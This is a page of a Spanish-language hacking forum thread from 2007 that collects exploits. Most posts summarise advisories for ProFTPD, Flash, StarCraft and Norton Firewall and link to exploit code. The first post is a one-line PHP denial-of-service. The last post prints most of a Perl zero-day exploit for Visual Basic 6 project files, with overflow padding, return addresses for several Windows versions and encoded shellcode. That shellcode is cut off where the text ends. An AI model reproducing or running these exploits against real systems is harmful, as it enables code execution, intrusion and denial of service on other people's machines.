Recopilatorio de Exploits Interesantes (-Actualizando-) página 5

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderadores: sirdarckcat, berz3k)

Recopilatorio de Exploits Interesantes (-Actualizando-)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: 1 2 3 4 [5]

Autor

Tema: Recopilatorio de Exploits Interesantes (-Actualizando-) (Leído 52627 veces)

yeikos

Colaborador

Desconectado

Mensajes: 1.363

PHP5 glob() Remote DoS Exploit - 0day

« Respuesta #60 en: 16 Julio 2007, 22:23 »

Citar

<?php
glob(1,-1);
?>

Fuente: http://www.0x000000.com/?i=388


	En línea

sirdarckcat

sdc
Moderador

Desconectado

Mensajes: 4.516

HAND

Re: <-> Recopilatorio de Exploits Interesantes (-Actualizando-)

« Respuesta #61 en: 28 Julio 2007, 05:07 »

El de flash

que "FUE" grande..

El video:

El exploit:
http://www.securityfocus.com/data/vulnerabilities/exploits/24856.zip

Saludos!!


	En línea

Leer reglas

Mis páginas web:
- mi web, my blog, my web

http://ejemplode.com/, http://sybsecurity.com/

yeikos

Colaborador

Desconectado

Mensajes: 1.363

Action Script 3 Socket Flaw Design

« Respuesta #62 en: 12 Agosto 2007, 13:25 »

Citar

Action Script 3 Socket Flaw Design

[Descripción]
Debido a un fallo en el diseño del manejo de sockets en Action Script 3,
es posible saltarse el modelo de seguridad sandbox de Flash, pudiendo
de este modo explorar localmente los puertos TCP del ordenador donde
se está ejecutando el flash.

[Plataformas funcionales]
- Windows XP SP2: Internet Explorer 6 / Flash Player 9.0.47.0
- Windows XP SP2: Firefox 2.0.0.5 / Flash Player 9.0.47.0
- Windows XP SP2: IE 7.0.5730.11 Flash Player 9.0.47.0
- Ubuntu Edgy: Firefox 2.0.0.5 / Flash Player 9.0.47.0
- Mac OSX 10.4.10: Safari 2.0.4 / Flash Player 9.0.47.0
- Mac OSX 10.4.10: Safari 3.0.2 / Flash Player 9.0.47.0
- Mac OSX 10.4.10: Firefox 2.0.0.6 / Flash Player 9.0.47.0
- Solaris 10 i86: Firefox 2.0.0.3 / Flash Player 9.0.47.0

[Plataformas no funcionales]
- Mac OSX 10.4.10: Opera 9.22 / Flash Player 9.0.47.0

[Enlaces]
- Prueba del concepto: http://scan.flashsec.org
- Código fuente: http://scan.flashsec.org/classes/Main.as

Fuente original: http://scan.flashsec.org


	En línea

WHK

Desconectado

Mensajes: 808

+-=[Yan]=-+

Debilidad del registro en los formatos binarios del Kernel de Linux

« Respuesta #63 en: 21 Agosto 2007, 05:56 »

Un documento creado por el equipo de GoodFellas demuestra la debilidad de diseño encontrado en el manejo de listas simplemente enlazadas usada para la registración de formatos de binario manejado por el kernel, el mismo afecta a toda la familia de kernel GNU/Linux (2.0/2.2/2.4/2.6), permitiendo la inserción de módulos de infección en kernel-space que pueden ser utilizados con fines personales para la creación de distintas herramientas de infección, por ejemplo rootkits.

Si bién, la utilización de la técnica presentada en el presente documento podría ser utilizada con fines de protección, prevención, control en la ejecución de binarios, y auditorías; la contramedida podría verse afectada directamente por la misma técnica.

Cabe destacar que la técnica utilizada para manejar la lista simplemente enlazada la consideramos correcta, no así el contexto de las estructuras de datos involucradas.

Ver documento en PDF (Español)
Ver documento en PDF (Ingles)
Presentación creada en H2HC (Ingles)
PoC

Fuentes:
http://whk.sitehacking.net/?p=31
http://goodfellas.shellcode.com.ar/

El PDF está bastante bueno, lleva tiempo pero aún vigente.


« Última modificación: 21 Agosto 2007, 05:58 por WHK »	En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: https://sourceforge.net/projects/whkfilemanager/ - http://www.jccharry.com/ (Actualizando)

yeikos

Colaborador

Desconectado

Mensajes: 1.363

ProFTPD MOD TLS Remote Buffer Overflow [Exploit] - 0day

« Respuesta #64 en: 25 Agosto 2007, 03:24 »

Citar

ProFTPD MOD_TLS Remote Buffer Overflow [Exploit]

[Descripción]

Debido a una limitación de seguridad no aplicada en una de las variables del módulo TLS (mod_tls.c),
es posible la ejecución código arbitrario remotamente en el servidor, comprometiendo tanto la integridad,
como la seguridad de éste.

[Versiones vulnerables]
- ProFTPD versión =< 1.3.0

[Enlaces]

- Página Web del fabricante: http://www.proftpd.org
- Exploit: http://www.milw0rm.com/exploits/4312
- Detalles técnicos: http://www.securityfocus.com/archive/1/452872
- Módulo TLS: http://www.castaglia.org/proftpd/modules/mod_tls.html


« Última modificación: 31 Agosto 2007, 01:11 por yeikos »	En línea

yeikos

Colaborador

Desconectado

Mensajes: 1.363

Blizzard StarCraft: Denegación del servicio local y remota

« Respuesta #65 en: 30 Agosto 2007, 02:01 »

Citar

Blizzard StarCraft: Denegación del servicio local y remota - 0day

[Descripción]

StarCraft es un juego de estrategia futurista en tiempo real de la compañía Blizzard Entertainment.

Cuando un jugador accede accede a una partida, local o remota en modo multijugador, se genera una
vista previa del mapa en cuestión. Generando una imagen malformada de esta vista previa,
es posible causar una violación de lectura conllevando a una denegación del servicio.

[Versiones vulnerables]
- StarCraft Brood War <= 1.15.1
- StarCraft <= 1.15.1

[Enlaces]
- Advisory: http://securityvulns.com/Rdocument915.html
- Prueba del concepto: http://blog.hispasec.com/lab/files/SC_PoC_DoS.scm
- Exploit (código fuente): http://blog.hispasec.com/lab/files/SC_Patch.c
- Exploit (binario): http://blog.hispasec.com/lab/files/SC_Patch.exe


« Última modificación: 31 Agosto 2007, 01:11 por yeikos »	En línea

yeikos

Colaborador

Desconectado

Mensajes: 1.363

Symantec Norton Personal Firewall 2006: Denegación del servicio [Exploit] - 0day

« Respuesta #66 en: 31 Agosto 2007, 01:05 »

Citar

Symantec Norton Personal Firewall 2006: Denegación del servicio [Exploit] - 0day

[Descripción]

Symantec Corporation posee una gran gama de productos orientados a la seguridad del usuario,
entre los que se encuentra el cortafuegos Norton Personal Firewall, vulnerable a una
denegación del servicio que pone en peligro la seguridad del usuario.

SSDT (Hooking System Service Descriptor Table) es el método más común y puesto en práctica,
por los cortafuegos, para comprobar los privilegios del proceso antes de que éste sea ejecutado.
Estas funciones reemplazan algunos servicios internos del sistema y son ejecutadas en el interior
del núcleo, pero sus llamadas son ejecutadas en modo usuario, de ahí el sumo cuidado con el que hay
que tratarlas.

Symantec Norton Personal Firewall utiliza varias funciones de este tipo, entre las que se encuentran
dos funciones que no validan los argumentos; NtCreateMutant y NtOpenEvent. Estas dos funciones pueden causar
errores en el controlador SPBBCDrv.sys de Norton al pasarle argumentos no válidos.

Al explotar esta vulnerabilidad se ocasionará una denegación del servicio, saltándose todos las protecciones
y finalizando el proceso del cortafuegos, comprometiendo la seguridad del usuario en la red.
La ejecución de código arbitrario aún no ha sido experimentada en esta vulnerabilidad.

[Versiones vulnerables]
- Symantec Norton Personal Firewall 2006 9.1.1 .7
- Symantec Norton Personal Firewall 2006 9.1 .33

[Enlaces]

- Advisory: http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument...
- Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/Symantec_Firewall_SPBBCDrv_DoS.c


	En línea

Spider-Net

Desconectado

Mensajes: 211

Un gran poder conlleva una gran responsabilidad

Exploit Visual Basic 6 Project

« Respuesta #67 en: 06 Septiembre 2007, 13:41 »

Nuevo exploit en perl para visual basic 6. Crea directamente una shell, es un exploit local para los archivos .VBP (Visual Basic Project).

Código

#!/usr/bin/perl
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'++ Author: Koshi                                      +
#'++ Email: heykoshi at gmail dot com                   +
#'++ Application: Microsoft Visual Basic 6.0            +
#'++                                                    +
#'++ Tested on Microsoft Windows XP Home Edition SP2    +
#'++ Patched & Updated                                  +
#'++                                                    +
#'++ The vulnerable buffer exsists in the .VBP files of +
#'++ Visual Basic projects. You can jump directly to    +
#'++ the shellcode, or jump to it via EBP.              +
#'++                                                    +
#'++ There is NO restriction of shellcode size either.  +
#'++                                                    +
#'++ Gr33tz: Rima my baby who I love and adore, Draven  +
#'++ for pointing me in the right direction, as always. +
#'++                                                    +
#'++                                                    +
#'++ This exploit is for educational use only, blah.    +
#'++                                                    +
#'++                                                    +
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# Ex. of Usage:
# perl vb6.pl 1 >>Project.vbp
# 
#
$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D".
	  "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A";
 
$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D".
	  "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30".
          "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D".
          "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23".
          "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E".
          "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53".
          "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F".
          "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75".
          "\x74\x6F\x6D\x61\x74\x69\x6F\x6E";
 
$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A".
          "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22";
 
$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	  "\x41\x41\x41\x41";
 
$codeAddr = "\x83\x25\x40\x01";
# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
#* ntdll.dll    - 0x7C923DA3      jmp Ebp **** Is the one i have used in this example.
# 0x77f6d42f  	jmp ebp   	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x77f7d9b6 	jmp ebp 	ntdll.dll  (English / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 	jmp ebp 	ntdll.dll  (English / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77faa6ce 	jmp ebp 	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x7c85eb73 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
# 0x7c8839ed 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
#*0x7c923da3 	jmp ebp 	ntdll.dll  (English / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f8c449 	jmp ebp   	ntdll.dll  (French / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f6d9b6  	jmp ebp   	ntdll.dll  (German / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
# 0x7c933da3 	jmp ebp  	ntdll.dll  (German / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f5d42f  	jmp ebp   	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
# 0x77f6d9b6 	jmp ebp 	ntdll.dll  (Italian / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 	jmp ebp 	ntdll.dll  (Italian / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f9a6ce 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
# 0x7c96eb73 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
# 0x7c9939ed 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
# ...backwards..if you don't know why, then gtfo.
$jmpEbp = "\xA3\x3D\x92\x7C";
$fourSkin = "\x44\x44\x44\x44";
 
 
$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".
	  "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41";
 
$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D".
	 "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65".
	 "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F".
	 "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72".
	 "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30".
	 "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74".
	 "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65".
	 "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77".
	 "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D".
	 "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C".
	 "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D".
	 "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65".
	 "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74".
	 "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68".
	 "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62".
	 "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61".
	 "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65".
	 "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A";
 
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". 
	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
	   "\x56\x58\x34\x5a